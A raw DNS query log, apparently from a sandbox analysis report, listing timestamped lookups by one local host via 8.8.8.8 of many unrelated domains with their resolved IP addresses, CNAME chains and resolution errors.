                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.491734982 CET8.8.8.8192.168.2.50xe6d4No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.495165110 CET8.8.8.8192.168.2.50x8a82Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.532439947 CET8.8.8.8192.168.2.50x1eb3No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.560339928 CET8.8.8.8192.168.2.50xf837No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.560339928 CET8.8.8.8192.168.2.50xf837No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.583653927 CET8.8.8.8192.168.2.50x9befServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.585369110 CET8.8.8.8192.168.2.50x29e0No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.587471962 CET8.8.8.8192.168.2.50xeeb3No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.598836899 CET8.8.8.8192.168.2.50xfb5No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.635623932 CET8.8.8.8192.168.2.50xa8fdNo error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.650250912 CET8.8.8.8192.168.2.50xf7b8No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.664613008 CET8.8.8.8192.168.2.50xd091No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.666848898 CET8.8.8.8192.168.2.50xc902No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.666848898 CET8.8.8.8192.168.2.50xc902No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.666848898 CET8.8.8.8192.168.2.50xc902No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.670797110 CET8.8.8.8192.168.2.50x1653No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.682456017 CET8.8.8.8192.168.2.50xd6e4No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.774405003 CET8.8.8.8192.168.2.50x887dNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.777828932 CET8.8.8.8192.168.2.50x3773Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.792747021 CET8.8.8.8192.168.2.50x9f9eServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.811350107 CET8.8.8.8192.168.2.50x61aNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.825325966 CET8.8.8.8192.168.2.50x46ccNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.833784103 CET8.8.8.8192.168.2.50x1019No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.889254093 CET8.8.8.8192.168.2.50x8570No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.889254093 CET8.8.8.8192.168.2.50x8570No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.889254093 CET8.8.8.8192.168.2.50x8570No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.889254093 CET8.8.8.8192.168.2.50x8570No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.892529011 CET8.8.8.8192.168.2.50xe0bdServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.910446882 CET8.8.8.8192.168.2.50x1624No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.947695971 CET8.8.8.8192.168.2.50xaa7cNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.947726011 CET8.8.8.8192.168.2.50xcc0aNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.014050007 CET8.8.8.8192.168.2.50x7a48No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.047734976 CET8.8.8.8192.168.2.50xb1cdNo error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.047734976 CET8.8.8.8192.168.2.50xb1cdNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.047734976 CET8.8.8.8192.168.2.50xb1cdNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.047734976 CET8.8.8.8192.168.2.50xb1cdNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.088219881 CET8.8.8.8192.168.2.50x2f7fNo error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.088219881 CET8.8.8.8192.168.2.50x2f7fNo error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.104765892 CET8.8.8.8192.168.2.50xa53bNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.115739107 CET8.8.8.8192.168.2.50x616bNo error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.176090002 CET8.8.8.8192.168.2.50x2b39No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.178651094 CET8.8.8.8192.168.2.50xa109No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.272619009 CET8.8.8.8192.168.2.50x97e5No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.409873009 CET8.8.8.8192.168.2.50x2169No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.492423058 CET8.8.8.8192.168.2.50x30f6No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.520735025 CET8.8.8.8192.168.2.50x8a82Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.532630920 CET8.8.8.8192.168.2.50x3ca7Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.558859110 CET8.8.8.8192.168.2.50xde56No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.583750010 CET8.8.8.8192.168.2.50x9befServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.602718115 CET8.8.8.8192.168.2.50x6cb5No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.723691940 CET8.8.8.8192.168.2.50x2348Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.993246078 CET8.8.8.8192.168.2.50xbfe3No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.021294117 CET8.8.8.8192.168.2.50x458bNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.062268972 CET8.8.8.8192.168.2.50xbaeNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.150789022 CET8.8.8.8192.168.2.50xaa2eServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.232551098 CET8.8.8.8192.168.2.50x51abNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.236426115 CET8.8.8.8192.168.2.50x76cdNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.236426115 CET8.8.8.8192.168.2.50x76cdNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.249079943 CET8.8.8.8192.168.2.50xc6a0No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.249079943 CET8.8.8.8192.168.2.50xc6a0No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.252935886 CET8.8.8.8192.168.2.50x4d2aServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.281503916 CET8.8.8.8192.168.2.50x4422No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.281503916 CET8.8.8.8192.168.2.50x4422No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.281552076 CET8.8.8.8192.168.2.50x2dd5No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.282366037 CET8.8.8.8192.168.2.50x597eNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.338800907 CET8.8.8.8192.168.2.50x5438No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.338800907 CET8.8.8.8192.168.2.50x5438No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.379283905 CET8.8.8.8192.168.2.50x28d9No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.399002075 CET8.8.8.8192.168.2.50x4fe0No error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.399002075 CET8.8.8.8192.168.2.50x4fe0No error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.420875072 CET8.8.8.8192.168.2.50x8a32Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.478777885 CET8.8.8.8192.168.2.50xe20dNo error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.478777885 CET8.8.8.8192.168.2.50xe20dNo error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.489332914 CET8.8.8.8192.168.2.50xaac7No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.508757114 CET8.8.8.8192.168.2.50xee20No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.508757114 CET8.8.8.8192.168.2.50xee20No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.523741961 CET8.8.8.8192.168.2.50xcd3cNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.564965010 CET8.8.8.8192.168.2.50xd8a6No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.573956966 CET8.8.8.8192.168.2.50x3ca7Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.632831097 CET8.8.8.8192.168.2.50x5a19Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.643340111 CET8.8.8.8192.168.2.50xed74No error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.643340111 CET8.8.8.8192.168.2.50xed74No error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.652645111 CET8.8.8.8192.168.2.50xae47No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.745634079 CET8.8.8.8192.168.2.50xcabdNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.751357079 CET8.8.8.8192.168.2.50x8a43No error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.751357079 CET8.8.8.8192.168.2.50x8a43No error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.752126932 CET8.8.8.8192.168.2.50x6a70No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.767014027 CET8.8.8.8192.168.2.50x88cfNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.767812014 CET8.8.8.8192.168.2.50xd192No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.781702995 CET8.8.8.8192.168.2.50xe9feNo error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.788604975 CET8.8.8.8192.168.2.50xfb42No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.824554920 CET8.8.8.8192.168.2.50xefdcNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.848661900 CET8.8.8.8192.168.2.50x1fccNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.895600080 CET8.8.8.8192.168.2.50xcebName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.931446075 CET8.8.8.8192.168.2.50x214dName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.969413042 CET8.8.8.8192.168.2.50x920bName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.011365891 CET8.8.8.8192.168.2.50x9ecaNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.014635086 CET8.8.8.8192.168.2.50x598dNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.014635086 CET8.8.8.8192.168.2.50x598dNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.033183098 CET8.8.8.8192.168.2.50x146aServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.039177895 CET8.8.8.8192.168.2.50x146aServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.122494936 CET8.8.8.8192.168.2.50xeb4dName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.161722898 CET8.8.8.8192.168.2.50xa2bdName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.216259003 CET8.8.8.8192.168.2.50x89d0No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.217259884 CET8.8.8.8192.168.2.50x6ce6No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.217259884 CET8.8.8.8192.168.2.50x6ce6No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.228694916 CET8.8.8.8192.168.2.50x8cfaServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.255836964 CET8.8.8.8192.168.2.50x6b55No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.288722992 CET8.8.8.8192.168.2.50xdd7aNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.411910057 CET8.8.8.8192.168.2.50xc0aNo error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.412858963 CET8.8.8.8192.168.2.50xffe1No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.413670063 CET8.8.8.8192.168.2.50x53a5No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.413670063 CET8.8.8.8192.168.2.50x53a5No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.414707899 CET8.8.8.8192.168.2.50xe2d3No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.415457010 CET8.8.8.8192.168.2.50xc32No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.481616974 CET8.8.8.8192.168.2.50xf474No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.481616974 CET8.8.8.8192.168.2.50xf474No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.481616974 CET8.8.8.8192.168.2.50xf474No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.481616974 CET8.8.8.8192.168.2.50xf474No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.501645088 CET8.8.8.8192.168.2.50xc3aeServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.514497042 CET8.8.8.8192.168.2.50x63c3Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.570962906 CET8.8.8.8192.168.2.50x8e2cNo error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.587505102 CET8.8.8.8192.168.2.50xf527No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.592788935 CET8.8.8.8192.168.2.50x3002No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.607952118 CET8.8.8.8192.168.2.50x7442No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.643001080 CET8.8.8.8192.168.2.50xac59No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.643938065 CET8.8.8.8192.168.2.50x856fNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.643938065 CET8.8.8.8192.168.2.50x856fNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.654788971 CET8.8.8.8192.168.2.50x3aedNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.656059980 CET8.8.8.8192.168.2.50x6cf4No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.656059980 CET8.8.8.8192.168.2.50x6cf4No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.656059980 CET8.8.8.8192.168.2.50x6cf4No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.656272888 CET8.8.8.8192.168.2.50x5a19Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.665388107 CET8.8.8.8192.168.2.50x9befServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.700887918 CET8.8.8.8192.168.2.50xa7eeServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.761043072 CET8.8.8.8192.168.2.50x8a13Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.763988972 CET8.8.8.8192.168.2.50xb927Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.780067921 CET8.8.8.8192.168.2.50xc524No error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.809869051 CET8.8.8.8192.168.2.50x74d1No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.809869051 CET8.8.8.8192.168.2.50x74d1No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.817198992 CET8.8.8.8192.168.2.50x3b8bServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.822159052 CET8.8.8.8192.168.2.50x16abNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.822159052 CET8.8.8.8192.168.2.50x16abNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.849575043 CET8.8.8.8192.168.2.50x2927No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.932136059 CET8.8.8.8192.168.2.50xffb5No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.935409069 CET8.8.8.8192.168.2.50x2171No error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.949600935 CET8.8.8.8192.168.2.50xb2c0Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.957261086 CET8.8.8.8192.168.2.50xf60bNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.957283020 CET8.8.8.8192.168.2.50x5bcaNo error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.957283020 CET8.8.8.8192.168.2.50x5bcaNo error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.960391045 CET8.8.8.8192.168.2.50x1c29No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.962802887 CET8.8.8.8192.168.2.50xa400No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.962802887 CET8.8.8.8192.168.2.50xa400No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:06.963845968 CET8.8.8.8192.168.2.50xcce1No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.034111023 CET8.8.8.8192.168.2.50x2dd4No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.059426069 CET8.8.8.8192.168.2.50x9850No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.095485926 CET8.8.8.8192.168.2.50xa538No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.095485926 CET8.8.8.8192.168.2.50xa538No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.105870962 CET8.8.8.8192.168.2.50xa3d0No error (0)invictus.pl193.107.88.74A (IP address)IN (0x0001)false
